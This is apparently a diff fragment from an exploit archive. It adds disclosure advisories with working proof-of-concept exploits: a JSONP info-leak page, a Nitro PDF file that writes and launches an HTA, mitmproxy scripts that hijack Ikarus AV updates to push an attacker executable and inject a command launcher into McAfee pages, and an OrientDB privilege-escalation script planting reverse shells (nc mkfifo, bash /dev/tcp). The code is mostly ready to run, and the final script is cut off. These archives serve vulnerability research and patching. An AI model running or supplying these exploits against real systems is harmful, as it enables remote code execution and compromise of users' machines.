The web server using JSONP and hosts sensitive information, including, configuration.
User controlled input is not sufficiently filterd, an unauthenticated attacker can send a POST request to /status.js with parameter func=$_APPLOG.Rfunc and extract sensitive information about the machine, including wheater the user is connected to VPN, to which VPN he/she is connected to what their real IP address.
## Proof of Concept
```
<head>
<script>
var $_APPLOG = function() { return 1; }
$_APPLOG.Rfunc = function(leak){
alert(JSON.stringify(leak));
}
</script>
</head>
<script>
var head = document.getElementsByTagName('head')[0];
var script = document.createElement('script');
script.id = 'jsonp';
script.src = 'http://127.0.0.1:895/status.js?func=$_APPLOG.Rfunc&tm='+(new Date().getTime());
head.appendChild(script);
</script>
```

294
exploits/windows/local/44063.md Normal file
View file

@ -0,0 +1,294 @@
## Vulnerabilities Summary
The following advisory describes three vulnerabilities found in Nitro / Nitro Pro PDF.
Nitro Pro is the PDF reader and editor that does everything you will ever need to do with PDF files. The powerful but snappy editor lets you change PDF documents with ease, and comes with a built-in OCR engine that can transform scanned documents into editable files. Fill up forms, annotate and sign them as part of your workflow, and easily merge multiple documents or delete selected pages as necessary.
If you use a large display or multiple monitors, NitroPDF also offers the ability to display PDF documents side-by-side so that you can pore through multiple documents. Of course, you could use AquaSnap to do that.
The vulnerabilities found in Nitro PDF are:
Doc.saveAs Directory Traversal Arbitrary File Write that lead to Command Execution
App.launchURL Command Execution
JPEG2000 npdf.dll Use-After-Free
Forms Parsing NPForms.npp Use-After-Free
File Parsing Count Field npdf.dll Memory Corruption
NewWindow Launch Action NPActions.npp Command
URI Action NPActions.npp Command Execution
This report contain the following vulnerabilities:
Doc.saveAs Directory Traversal Arbitrary File Write that lead to Command Execution
App.launchURL Command Execution
JPEG2000 npdf.dll Use-After-Free
## Credit
Two independent security researchers, Steven Seeley and anonymous, have reported these vulnerabilities to Beyond Securitys SecuriTeam Secure Disclosure program.
## Vendor response
The vendor has released patches to address this vulnerability. “Number of the reported vulnerabilities have been resolved and confirmed, and will included in our next release of Nitro Pro, 11.05.”
For more details: https://www.gonitro.com/support/downloads#securityUpdates
CVE:
CVE-2017-2796
CVE-2017-7950
## Vulnerabilities Details
Doc.saveAs Directory Traversal Arbitrary File Write that lead to Command Execution
The Doc.saveAs function does not validate either the file extension, the content of the PDF or if the path contains traversals before saving it to disk.
An attacker can leverage this to write a malicious file to the operating system in any path. This alone can be used to achieve remote code execution by writing into the users startup folder.
App.launchURL Command Execution
The App.launchURL function allows an attacker to execute commands with the privileges of the currently running user. However, a security alert or warning is typically triggered when doing so.
This can be bypassed if a $ sign is used within the path. Note that if an attacker does this, they will execute the file from the current directory, which may not be ideal for exploitation.
Also note, that the App.launchURL function does not filter for space characters such as carriage return and line feeds. This can allow an attacker to spoof the file /url being launched.
## Doc.saveAs and App.launchURL Remote Code Execution Proof of Concept
```
%PDF-1.7
4 0 obj
<<
/Length 0
>>
stream
<script>
// enter your shellcode here
WshShell = new ActiveXObject("WScript.Shell");
WshShell.Run("c:/windows/system32/calc.exe", 1, false);
</script>
endstream endobj
5 0 obj
<<
/Type /Page
/Parent 2 0 R
/Contents 4 0 R
>>
endobj
1 0 obj
<<
/Type /Catalog
/Pages 2 0 R
/OpenAction [ 5 0 R /Fit ]
/Names <<
/JavaScript <<
/Names [
(EmbeddedJS)
<<
/S /JavaScript
/JS (
this.saveAs('../../../../../../../../../../../../../../../../Windows/Temp/si.hta');
app.launchURL('c$:/../../../../../../../../../../../../../../../../Windows/Temp/si.hta');
)
>>
]
>>
>>
>>
endobj
2 0 obj
<</Type/Pages/Count 1/Kids [ 5 0 R ]>>
endobj
3 0 obj
<<>>
endobj
xref
0 6
0000000000 65535 f
0000000166 00000 n
0000000244 00000 n
0000000305 00000 n
0000000009 00000 n
0000000058 00000 n
trailer <<
/Size 6
/Root 1 0 R
>>
startxref
327
%%EOF
```
## JPEG2000 npdf.dll Use-After-Free
When parsing a malformed embedded JPEG2000 image into a PDF the process will destroy an object in memory, forcing a pointer to be reused after it has been free. The reuse functions are located in the npdf.dll.
when browsing a folder with the mutated files and attaching to the newly launched dllhost.exe, WinDbg will show:
```
...
CNitroPDFThumbProvider::GetThumbnail - prepare device to renderCNitroPDFThumbProvider::GetThumbnail - render the page(1010.1038): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
npdf!CxRect2::Width+0x4f6f6:
000007fe`e592dd16 488b01 mov rax,qword ptr [rcx] ds:feeefeee`feeefeee=????????????????
...
...
000007fe`e592dd16 488b01 mov rax,qword ptr [rcx] ds:feeefeee`feeefeee=????????????????
000007fe`e592dd19 ff90d0000000 call qword ptr [rax+0D0h]
...
```
When opening the file with Nitro PDF Reader 32 BIT, WinDbg will show ex. :
```
...
(d7c.1210): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=05fffda8 ebx=0133115c ecx=16cf6c38 edx=013311c0 esi=00000000 edi=00000000
eip=4f532f32 esp=01145614 ebp=01145628 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
4f532f32 ?? ???
...
1
2
3
4
5
6
7
8
9
...
(d7c.1210): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=05fffda8 ebx=0133115c ecx=16cf6c38 edx=013311c0 esi=00000000 edi=00000000
eip=4f532f32 esp=01145614 ebp=01145628 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
4f532f32 ?? ???
...
eip is overwritten with random memory.
Disassembly of the prior call:
...
68dbff59 8b4af0 mov ecx,dword ptr [edx-10h]
68dbff5c 85c9 test ecx,ecx
68dbff5e 7409 je npdf!TerminateApp+0xb7d99 (68dbff69)
68dbff60 8b01 mov eax,dword ptr [ecx]
68dbff62 ff5010 call dword ptr [eax+10h]
...
1
2
3
4
5
6
7
...
68dbff59 8b4af0 mov ecx,dword ptr [edx-10h]
68dbff5c 85c9 test ecx,ecx
68dbff5e 7409 je npdf!TerminateApp+0xb7d99 (68dbff69)
68dbff60 8b01 mov eax,dword ptr [ecx]
68dbff62 ff5010 call dword ptr [eax+10h]
...
call stack:
...
# ChildEBP RetAddr Args to Child
00 01145610 68dbff65 694dc564 0133115c 01145678 0x4f532f32
01 01145628 691f7bab 0114567c 00000000 00000000 npdf!TerminateApp+0xb7d95
02 01145650 691f7a42 0114567c 03a1aa80 013311c0 npdf!CxRect2::Width+0x5220b
03 0114568c 691f7ab7 00000000 00000001 691ed76b npdf!CxRect2::Width+0x520a2
04 011456a0 6938952b 68c70000 00000000 00000001 npdf!CxRect2::Width+0x52117
05 011456e0 693894b2 68c70000 00000000 00000001 npdf!CxRect2::Width+0x1e3b8b
06 011456f4 77b092e0 68c70000 00000000 00000001 npdf!CxRect2::Width+0x1e3b12
07 01145714 77b29da4 69389496 68c70000 00000000 ntdll!RtlQueryEnvironmentVariable+0x241
08 011457b8 77b29c46 0133da3c 77b096e5 0133da40 ntdll!LdrShutdownProcess+0x141
09 011457cc 76ca79c5 00000000 77e8f3b0 ffffffff ntdll!RtlExitUserProcess+0x74
0a 011457e0 693926a6 ffffffff 01145834 69392aae kernel32!ExitProcess+0x15
0b 011457ec 69392aae ffffffff bf850c3a 16cf003a npdf!CxRect2::Width+0x1ecd06
0c 01145834 69392ad2 ffffffff 00000000 00000000 npdf!CxRect2::Width+0x1ed10e
0d 01145848 6916a9c7 ffffffff 690bb918 bf850c62 npdf!CxRect2::Width+0x1ed132
0e 0114586c 690ff453 bf850cb6 16cf003a 16cf0030 npdf!CxImage::Thumbnail+0x14907
0f 011458b8 690e7319 16cf003a 00000200 16cefdc0 npdf!CxImageJAS::Encode+0x5abb3
10 01145920 690dfc47 00000000 00000000 bf850d7a npdf!CxImageJAS::Encode+0x42a79
11 01145974 6907c89d 1691a5b0 00000000 bf85f4ca npdf!CxImageJAS::Encode+0x3b3a7
12 0114a0c4 6907da8e 0114aab4 0114ab04 bf85f556 npdf!CxImagePNG::user_write_data+0x6bc1d
13 0114a158 68eb0f95 0114aae4 00034627 00000000 npdf!CxImagePNG::user_write_data+0x6ce0e
14 0114a178 68eb1660 0114aae4 00034627 00000000 npdf!CxImage::~CxImage+0x88f35
15 0114a1d8 68eb0d1a 00000000 0404004c 0114aae4 npdf!CxImage::~CxImage+0x89600
16 0114aa80 68dea973 0114aae4 00034627 00000000 npdf!CxImage::~CxImage+0x88cba
17 0114ab28 68dea846 00000000 04080055 bf85ffb2 npdf!TerminateApp+0xe27a3
18 0114abbc 68dea566 00000000 04090034 bf85ffea npdf!TerminateApp+0xe2676
19 0114abe4 68d29e9b 00000000 04090034 00000002 npdf!TerminateApp+0xe2396
1a 0114ac0c 68d29952 00000000 04090034 00000002 npdf!TerminateApp+0x21ccb
1b 0114ac24 68f93f9b 00000000 04090034 00000002 npdf!TerminateApp+0x21782
1c 0114ac5c 68efe9c0 00001de2 00000ce4 000009f6 npdf!CxImage::~CxImage+0x16bf3b
1d 0114b6dc 68fa54c8 0114b77c bf85953e 061e8998 npdf!CxImage::~CxImage+0xd6960
1e 0114c130 68e3e6a6 16ba3598 00000000 00000000 npdf!CxImage::~CxImage+0x17d468
1f 0114c168 68e4133d 16c8c150 0114c1b0 16ba3438 npdf!CxImage::~CxImage+0x16646
20 0114c1a8 68e37ca2 061e8998 bf859df6 16ba3438 npdf!CxImage::~CxImage+0x192dd
21 0114c9f8 68e5b509 bf859a92 0575f818 16ba3438 npdf!CxImage::~CxImage+0xfc42
22 0114ce9c 68e5a956 0114d730 68e4016b 00000000 npdf!CxImage::~CxImage+0x334a9
23 0114cea4 68e4016b 00000000 014e4020 0114e14c npdf!CxImage::~CxImage+0x328f6
24 0114d730 68d786df 4b011fcc 0114e0fc 00000000 npdf!CxImage::~CxImage+0x1810b
25 0114dff8 68d7a771 4b011fcc 0114e0fc 00000000 npdf!TerminateApp+0x7050f
26 0114e020 014e6381 16bc08e8 0114e0f4 bc2b49e1 npdf!TerminateApp+0x725a1
27 0114e634 014eb65d 16ca1778 5b012454 0114e678 NitroPDF!CxIOFile::Write+0x92521
28 0114ee9c 73f8b443 0114eeb8 bf88cba9 16ca1778 NitroPDF!CxIOFile::Write+0x977fd
29 0114ef1c 73f9ae0c bf88cb9d 16ca1778 16ca1778 mfc120u+0x22b443
2a 0114efe0 73f9a901 0000000f 00000000 00000000 mfc120u+0x23ae0c
2b 0114f000 73f98f33 0000000f 00000000 00000000 mfc120u+0x23a901
2c 0114f070 73f99155 16ca1778 004509c0 0000000f mfc120u+0x238f33
2d 0114f090 73e97e8e 004509c0 0000000f 00000000 mfc120u+0x239155
2e 0114f0cc 76fa62fa 004509c0 0000000f 00000000 mfc120u+0x137e8e
2f 0114f0f8 76fa6d3a 73e97e5a 004509c0 0000000f USER32!gapfnScSendMessage+0x332
30 0114f170 76fa6de8 00000000 73e97e5a 004509c0 USER32!GetThreadDesktop+0xd7
31 0114f1cc 76fa6e44 02055d40 00000000 0000000f USER32!GetThreadDesktop+0x185
32 0114f208 77ae010a 0114f220 00000000 0114f274 USER32!GetThreadDesktop+0x1e1
33 0114f284 76fa788a 73e97e5a 00000000 0114f2c0 ntdll!KiUserCallbackDispatcher+0x2e
34 0114f294 73f886f2 012fa0f8 00000001 0178ef40 USER32!DispatchMessageW+0xf
35 0114f2c0 0153365e bc2b5389 ffffffff 0178ef40 mfc120u+0x2286f2
36 0114fc5c 73fabde4 00000000 00000020 00000001 NitroPDF!CxIOFile::Write+0xdf7fe
37 0114fc70 0164e72d 013e0000 00000000 012b3120 mfc120u+0x24bde4
38 0114fcbc 76ca336a 7efde000 0114fd08 77b09882 NitroPDF!CxImageJPG::CxExifInfo::process_SOFn+0x637dd
39 0114fcc8 77b09882 7efde000 741ca300 00000000 kernel32!BaseThreadInitThunk+0x12
3a 0114fd08 77b09855 0164e7ab 7efde000 ffffffff ntdll!RtlInitializeExceptionChain+0x63
3b 0114fd20 00000000 0164e7ab 7efde000 00000000 ntdll!RtlInitializeExceptionChain+0x36
...
```
## reuse function, npdf.dll:
```
;----------------------------------------------------------------------------------------------------
1014FF59 L1014FF59:
1014FF59 8B4AF0 mov ecx,[edx-10h]
1014FF5C 85C9 test ecx,ecx
1014FF5E 7409 jz L1014FF69
1014FF60 8B01 mov eax,[ecx] <--- ecx -> junk
1014FF62 FF5010 call [eax+10h] <--- Crash
1014FF65 85C0 test eax,eax
1014FF67 750C jnz L1014FF75
1014FF69 L1014FF69:
1014FF69 E8123D4300 call SUB_L10583C80
1014FF6E 8BC8 mov ecx,eax
1014FF70 8B10 mov edx,[eax]
1014FF72 FF5210 call [edx+10h]
1014FF75 L1014FF75:
1014FF75 8B4D08 mov ecx,[ebp+08h]
1014FF78 50 push eax
1014FF79 8B03 mov eax,[ebx]
1014FF7B 56 push esi
1014FF7C 8D0478 lea eax,[eax+edi*2]
1014FF7F 50 push eax
1014FF80 E83BC2FFFF call SUB_L1014C1C0
1014FF85 8B4508 mov eax,[ebp+08h]
1014FF88 5F pop edi
1014FF89 5E pop esi
1014FF8A 5B pop ebx
1014FF8B 8BE5 mov esp,ebp
1014FF8D 5D pop ebp
1014FF8E C20C00 retn 000Ch
;----------------------------------------------------------------------------------------------------
```

23
exploits/windows/local/44066.md Normal file
View file

@ -0,0 +1,23 @@
## Vulnerability Summary
The following advisory describes a DLL Hijacking vulnerability found in Dashlane.
Dashlane is “a password manager app and secure digital wallet. The app is available on Mac, PC, iOS and Android. The apps premium feature enables users to securely sync their data between an unlimited number of devices on all platforms.”
## Credit
An independent security researcher, Paulos Yibelo, has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program
## Vendor response
We have informed Dashlane of the vulnerability, their answer was: “Since there are many ways to load DLLs/code in a process under Windows, we are currently rewriting part of the installer to install in Program Files (we use %appdata% for the non admin users like many other applications), and you can already replace DLLl/exe if you are privileged to write in the user %appdata%/…/dashlane directory, we wont change the current way of loading DLLs in the short term.”
At this time there is no solution or workaround for this vulnerability.
CVE: CVE-2017-11657
## Vulnerability details
When Dashlane starts on a Windows machine it tries to load a DLL (WINHTTP.dll) from the C:\Users\user\AppData\Roaming\Dashlane\ directory, if a malicious attacker puts the DLL in that directory Dashlane will load it and run the code found in it without giving the user any warning of it.
This happens because:
Dashlane does not provide the file WINHTTP.dll.
Writing in %appdata% doesnt require any special privileges, the file called WINHTTP.dll can be placed in the path C:\Users\user\AppData\Roaming\Dashlane\.
Since Dashlane can require admin privileges, an attacker can place the nwinhttp.dll and cause script/command execution as the current user (usually admin).

229
exploits/windows/remote/44055.md Normal file
View file

@ -0,0 +1,229 @@
## Vulnerability summary
The following advisory describes an remote code execution found in Ikraus Anti Virus version 2.16.7.
KARUS anti.virus “secures your personal data and PC from all kinds of malware. Additionally, the Anti-SPAM module protects you from SPAM and malware from e-mails. Prevent intrusion and protect yourself against cyber-criminals by choosing IKARUS anti.virus, powered by the award-winning IKARUS scan.engine. It is among the best in the world, detecting new and existing threats every day. ”
## Credit
An independent security researcher has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program
## Vendor Response
Update 1
CVE: CVE-2017-15643
The vendor has released patches to address these vulnerabilities.
For more information: https://www.ikarussecurity.com/about-ikarus/security-blog/vulnerability-in-windows-antivirus-products-ik-sa-2017-0001/
## Vulnerability details
An active network attacker (MiTM) can achieve remote code execution on a machine that runs Ikraus Anti Virus.
Ikarus AV for windows uses cleartext HTTP for updates along with a CRC32 checksum and an update value for verification of the downloaded files.
Also ikarus checks for a update version number which can be incremented to goad the process to update.
The update process executable in ikarus called guardxup.exe
guardxup.exe, send over port 80, the following request for update:
```
GET /cgi-bin/virusutilities.pl?A=7534ED66&B=6.1.1.0.11.1.256.7601&C=1005047.2013019.2001016.98727&F=4.5.2%3bO=0%3bSP=0&E=WD-194390-VU HTTP/1.1
Accept: */*
User-Agent: virusutilities(6.1,0,1005047)
Host: updates.ikarus.at
Connection: close
```
The server will respond with:
```
HTTP/1.1 200 OK
Date: Sun, 23 Oct 2016 04:51:05 GMT
Server: Apache/2.4.10 (Debian) mod_perl/2.0.9dev Perl/v5.20.2
Content-Disposition: inline; filename=virusutilities
Content-Length: 306
Connection: close
Content-Type: text/plain; charset=ISO-8859-1
<url>
full http://mirror04.ikarus.at/updates/
diff http://mirror06.ikarus.at/updates/
</url>
<up>
antispam_w64 001000076
antispam 001000076
update 001005047
virusutilities 002013019
t3modul_w64 002001016
t3modul 002001016
sdb 000007074
t3sigs 000098727
</up>
<dependence>
t3modul
</dependence>
```
```
Through the proxy we will modify the response and add 1 to the update value and forward the response to the client.
Then the client will request the update via this url: http://mirror04.ikarus.at/updates/guardxup001005048.full
The ikarus server will respond with a 404:
```
HTTP/1.1 404 Not Found
Server: nginx/1.6.2
Date: Sun, 23 Oct 2016 04:53:05 GMT
Content-Type: text/html
Content-Length: 168
Connection: close
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.6.2</center>
</body>
</html>
```
But we will modify the response with a IKUP format:
```
Bytes: 0x0 - 0x3 == IKUP # header
Bytes: 0x4 - 0x7 == 0x0s
Bytes: 0x8 == 0x3C # pointer to start of PE EXE MZ header
Bytes: 0x20 - 0x23 == update value in little endian (script fixes it up)
Bytes: 0x24 - 0x27 == crc32 checksum (script populates from provided binary)
Bytes: 0x28 -> pointer to MZ header == 0x0s
Bytes: 'pointer to MZ header' -> ? == appended exe
```
Then we will forward to the update to the client, where it replaces guardxup.exe with our executable.
## Proof of concept
Please install mitmproxy 0.17 pip install mitmproxy==0.17
To use this script, youll need to MITM port 80 traffic from the client for use with a transparent proxy.
Set your firewall rules to intercept 80 traffic on port 8080:
```
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
```
and execute the script as follows:
```
./poc.py file_to_deploy.exe
```
```
#!/usr/bin/env python2
import os
try:
from mitmproxy import controller, proxy, platform
from mitmproxy.proxy.server import ProxyServer
except:
from libmproxy import controller, proxy, platform
from libmproxy.proxy.server import ProxyServer
import re
import struct
import sys
import zlib
import bz2
class IkarusPOC(controller.Master):
def __init__(self, server, backdoored_file):
controller.Master.__init__(self, server)
self.ikarus= {}
self.crc_file = 0
self.backdoored_file = backdoored_file
self.to_replace = 0
self.already_patched = 0
self.update_number = 0
def win_header(self):
self.update_header = "\x49\x4B\x55\x50\x00\x00\x00\x00\x3C\x00\x00\x00\x00\x00\x00\x00"
self.update_header += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
self.update_header += struct.pack("<I", self.to_replace) # update number
self.update_header += struct.pack("<I", self.crc_file) # checksum
self.update_header += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
self.update_header += "\x00\x00\x00\x00"
def run(self):
try:
return controller.Master.run(self)
except KeyboardInterrupt:
self.shutdown()
def crc_stream(self, a_string):
prev = 0
return zlib.crc32(a_string, prev) & 0xFFFFFFFF
def crc(self, some_file):
prev = 0
for eachLine in open(some_file,"rb"):
prev = zlib.crc32(eachLine, prev)
self.crc_file = prev & 0xFFFFFFFF
print "[*] crc_file", self.crc_file
def handle_request(self, flow):
hid = (flow.request.host, flow.request.port)
flow.reply()
def handle_response(self, flow):
print "[*] flow.request.host:", flow.request.host
if "cgi-bin/imsa-lite.pl" in flow.request.path and "Dalvik" in flow.request.headers['User-Agent'] and self.already_patched <=2:
content = flow.reply.obj.response.content
p = re.compile("antispam[\s|\t].*\n")
result = p.search(content)
the_result = result.group(0)
original_update_number= [int(s) for s in the_result.split() if s.isdigit()][0]
if self.update_number == 0:
self.update_number = original_update_number
self.to_replace = self.update_number + 1
content = content.replace(str(original_update_number), str(self.to_replace))
flow.reply.obj.response.content = content
if "cgi-bin/virusutilities.pl" in flow.request.path and 'virusutilities' in flow.request.headers['User-Agent'] and self.already_patched <= 2:
print "[*] Found update response, modifying..."
content = flow.reply.obj.response.content
p = re.compile("update[\s|\t].*\n")
result = p.search(content)
the_result = result.group(0)
original_update_number = [int(s) for s in the_result.split() if s.isdigit()][0]
if self.update_number == 0:
self.update_number = original_update_number
self.to_replace = self.update_number + 1
print '[*] Update_number', self.update_number
print '[*] Replace number', self.to_replace
content = content.replace(str(original_update_number), str(self.to_replace))
print "[*] Updated content", content
flow.reply.obj.response.content = content
if 'guard' in flow.request.path and 'full' in flow.request.path and self.already_patched <= 2:
print '[*] Found guardxup.exe request! Modifying request and pushing provided file!'
self.crc(self.backdoored_file)
self.win_header()
with open(self.backdoored_file, 'rb') as f:
file_out = f.read()
content = self.update_header + file_out
with open('/tmp/update_test.full', 'wb') as f:
f.write(content)
flow.reply.obj.response.content = content
flow.reply.obj.response.status_code = 200
self.already_patched += 1
flow.reply()
config = proxy.ProxyConfig(port=8080, mode='transparent')
server = ProxyServer(config)
m = IkarusPOC(server, sys.argv[1])
m.run()
```

84
exploits/windows/remote/44067.md Normal file
View file

@ -0,0 +1,84 @@
## Vulnerability Summary
The following advisory describes a Remote Code Execution found in McAfee Security Scan Plus. An active network attacker could launch a man-in-the-middle attack on a plaintext-HTTP response to a client to run any residing executables with privileges of a logged in user.
McAfee Security Scan Plus is a free diagnostic tool that ensures you are protected from threats by actively checking your computer for up-to-date anti-virus, firewall, and web security software. It also scans for threats in any open programs.
## Credit
An independent security research company, Silent Signal, has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program.
## Vendor response
The vendor has released patches to address this vulnerability.
For more information: https://service.mcafee.com/webcenter/portal/cp/home/articleview?articleId=TS102714
CVE: CVE-2017-3897
## Vulnerability details
McAfee Security Scan Plus retrieves promotional and UI design information from different mcafee.com domains and displays them to the user, typically in the main application window.
The vulnerability is caused by multiple factors:
Information is retrieved over plaintext HTTP that can be trivially modified by an active network attacker.
McAfee Security Scan Plus rely on the MCBRWSR2.DLL library to display HTML content. The Library exposes the LaunchApplication() JavaScript API that executes arbitrary commands on the affected system.
The McAfee Security Scan Plus downloads, after each scan, a UI element indicating the “protection level” of the target from the following URL:
```
http://home.mcafee.com/SecurityScanner/SSBanner.aspx
```
The following screenshot shows the placeholder of the web content while it is loaded (marked with red):
Although the original response redirects to a secure HTTPS URL (and server certificates are verified by the client), from a man-in-the-middle position its possible to replace the redirection message with a HTTP response indicating success, and containing the call to the LaunchApplication() JavaScript API:
```
<script>
window.external.LaunchApplication("c:\\windows\\system32\\calc.exe", "");
</script>
```
The above JavaScript executes the Windows Calculator (without arguments) with the privileges of the logged in user (on the users Desktop). The request is made every time the user initiates a scan or when a scan is initiated automatically by default the product is configured for weekly scans, the exact time depends on the time of the installation.
## Proof of Concept
```
#!/usr/bin/env python3
#
# HTTP proxy mode:
# mitmproxy -s mcsploit_inline.py --ignore '.*'
#
# Transparent proxy mode:
# mitmproxy -s mcsploit_inline.py -T
#
from mitmproxy import ctx, http
import requests
import time
COMMAND="c:\\\\windows\\\\system32\\\\calc.exe"
CMDARGS=""
def response(flow):
if flow.request.scheme == "http" and (flow.request.headers['host'].endswith("mcafee.com") or "mcafee" in flow.request.url):
if flow.response.status_code == 302:
ctx.log("[+] [MCSPLOIT] Insecure McAfee request found! (HTML)")
https_url=flow.request.url.replace("http://","https://")
r=requests.get(https_url,headers=flow.request.headers,verify=False)
if "text/html" not in r.headers['content-type']: return
contents=r.text
contents=contents.replace("</head>","<script>try{window.external.LaunchApplication(\"%s\",\"%s\");}catch(launchapperr){var x;}</script></head>" % (COMMAND, CMDARGS))
flow.response = http.HTTPResponse.make(200,bytes(contents,encoding="utf-8"),{"Content-Type": "text/html; charset=utf-8","Expires":"-1"})
return
try:
if flow.response.headers["content-type"] == "text/javascript":
ctx.log("[+] [MCSPLOIT] Insecure McAfee request found! (JS)")
inject="try{window.external.LaunchApplication(\"%s\",\"%s\");}catch(launchapperr){var x;}\n" % (COMMAND, CMDARGS)
try:
flow.response.contents = inject + flow.response.contents
except AttributeError:
ctx.log("[-] [MCSPLOIT] No content in the original response!")
pass
except KeyError:
pass
```

216
exploits/windows/remote/44068.md Normal file
View file

@ -0,0 +1,216 @@
## Vulnerability Summary
The following advisory reports a vulnerability in OrientDB which allows users of the product to cause it to execute code.
OrientDB is a Distributed Graph Database engine with the flexibility of a Document Database all in one product. The first and best scalable, high-performance, operational NoSQL database.
## Credit
An independent security researcher, Francis Alexander, has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program.
## Vendor response
The vendor has released patches to address this vulnerability and issue CVE-2017-11467.
For more information: https://github.com/orientechnologies/orientdb/wiki/OrientDB-2.2-Release-Notes#security.
## Vulnerability Details
OrientDB uses RBAC model for authentication schemes. By default an OrientDB has 3 roles admin, writer and reader. These have their usernames same as the role. For each database created on the server, it assigns by default these 3 users.
The privileges of the users are:
admin access to all functions on the database without any limitation
reader read-only user. The reader can query any records in the database, but cant modify or delete them. It has no access to internal information, such as the users and roles themselves
writer same as the reader, but it can also create, update and delete records
ORole structure handles users and their roles and is only accessible by the admin user. OrientDB requires oRole read permissions to allow the user to display the permissions of users and make other queries associated with oRole permissions.
From version 2.2.x and above whenever the oRole is queried with a where, fetchplan and order by statements, this permission requirement is not required and information is returned to unprivileged users.
Example:
```
select * from <em>oRole</em> order by name;
```
The user writer which is created with every database you create. Thus even if the db admin changes the admin user password, an attacker would still be able to get Code Execution with the writer user.
Since we enable the functions where, fetchplan and order by, and OrientDB has a function where you could execute groovy functions and this groovy wrapper doesnt have a sandbox and exposes system functionalities, we can run any command we want.
Sample Groovy function:
Command.md
```
def command = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 8081
>/tmp/f'
File file = new File("hello.sh")
file.delete()
file << ("#!/bin/bash\n")
file << (command)
def proc = "bash hello.sh".execute()
```
## Proof of Concept
Run Netcat at port 8081
```
nc -lv 8081
```
Run the following:
```
python PoC.py ip [port] // By default uses 2480
```
PoC.py
```
import sys
import requests
import json
import string
import random
target = sys.argv[1]
try:
port = sys.argv[2] if sys.argv[2] else 2480
except:
port = 2480
url = "http://%s:%s/command/GratefulDeadConcerts/sql/-/20?format=rid,type,version,class,graph"%(target,port)
def random_function_name(size=5, chars=string.ascii_lowercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
def enum_databases(target,port="2480"):
base_url = "http://%s:%s/listDatabases"%(target,port)
req = requests.get(base_url)
if req.status_code == 200:
#print "[+] Database Enumeration successful"
database = req.json()['databases']
return database
return False
def check_version(target,port="2480"):
base_url = "http://%s:%s/listDatabases"%(target,port)
req = requests.get(base_url)
if req.status_code == 200:
headers = req.headers['server']
#print headers
if "2.2" in headers or "3." in headers:
return True
return False
def run_queries(permission,db,content=""):
databases = enum_databases(target)
url = "http://%s:%s/command/%s/sql/-/20?format=rid,type,version,class,graph"%(target,port,databases[0])
priv_enable = ["create","read","update","execute","delete"]
#query = "GRANT create ON database.class.ouser TO writer"
for priv in priv_enable:
if permission == "GRANT":
query = "GRANT %s ON %s TO writer"%(priv,db)
else:
query = "REVOKE %s ON %s FROM writer"%(priv,db)
req = requests.post(url,data=query,auth=('writer','writer'))
if req.status_code == 200:
pass
else:
if priv == "execute":
return True
return False
print "[+] %s"%(content)
return True
def priv_escalation(target,port="2480"):
print "[+] Checking OrientDB Database version is greater than 2.2"
if check_version(target,port):
priv1 = run_queries("GRANT","database.class.ouser","Privilege Escalation done checking enabling operations on database.function")
priv2 = run_queries("GRANT","database.function","Enabled functional operations on database.function")
priv3 = run_queries("GRANT","database.systemclusters","Enabling access to system clusters")
if priv1 and priv2 and priv3:
return True
return False
def exploit(target,port="2480"):
#query = '"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":null,"name":"most","language":"groovy","code":"def command = \'bash -i >& /dev/tcp/0.0.0.0/8081 0>&1\';File file = new File(\"hello.sh\");file.delete();file << (\"#!/bin/bash\\n\");file << (command);def proc = \"bash hello.sh\".execute(); ","parameters":null'
#query = {"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":None,"name":"ost","language":"groovy","code":"def command = 'whoami';File file = new File(\"hello.sh\");file.delete();file << (\"#!/bin/bash\\n\");file << (command);def proc = \"bash hello.sh\".execute(); ","parameters":None}
func_name = random_function_name()
print func_name
databases = enum_databases(target)
reverse_ip = raw_input('Enter the ip to connect back: ')
query = '{"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":null,"name":"'+func_name+'","language":"groovy","code":"def command = \'bash -i >& /dev/tcp/'+reverse_ip+'/8081 0>&1\';File file = new File(\\"hello.sh\\");file.delete();file << (\\"#!/bin/bash\\\\n\\");file << (command);def proc = \\"bash hello.sh\\".execute();","parameters":null}'
#query = '{"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":null,"name":"'+func_name+'","language":"groovy","code":"def command = \'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 8081 >/tmp/f\' \u000a File file = new File(\"hello.sh\")\u000a file.delete() \u000a file << (\"#!/bin/bash\")\u000a file << (command)\n def proc = \"bash hello.sh\".execute() ","parameters":null}'
#query = {"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":None,"name":"lllasd","language":"groovy","code":"def command = \'bash -i >& /dev/tcp/0.0.0.0/8081 0>&1\';File file = new File(\"hello.sh\");file.delete();file << (\"#!/bin/bash\\n\");file << (command);def proc = \"bash hello.sh\".execute();","parameters":None}
req = requests.post("http://%s:%s/document/%s/-1:-1"%(target,port,databases[0]),data=query,auth=('writer','writer'))
if req.status_code == 201:
#print req.status_code
#print req.json()
func_id = req.json()['@rid'].strip("#")
#print func_id
print "[+] Exploitation successful, get ready for your shell.Executing %s"%(func_name)
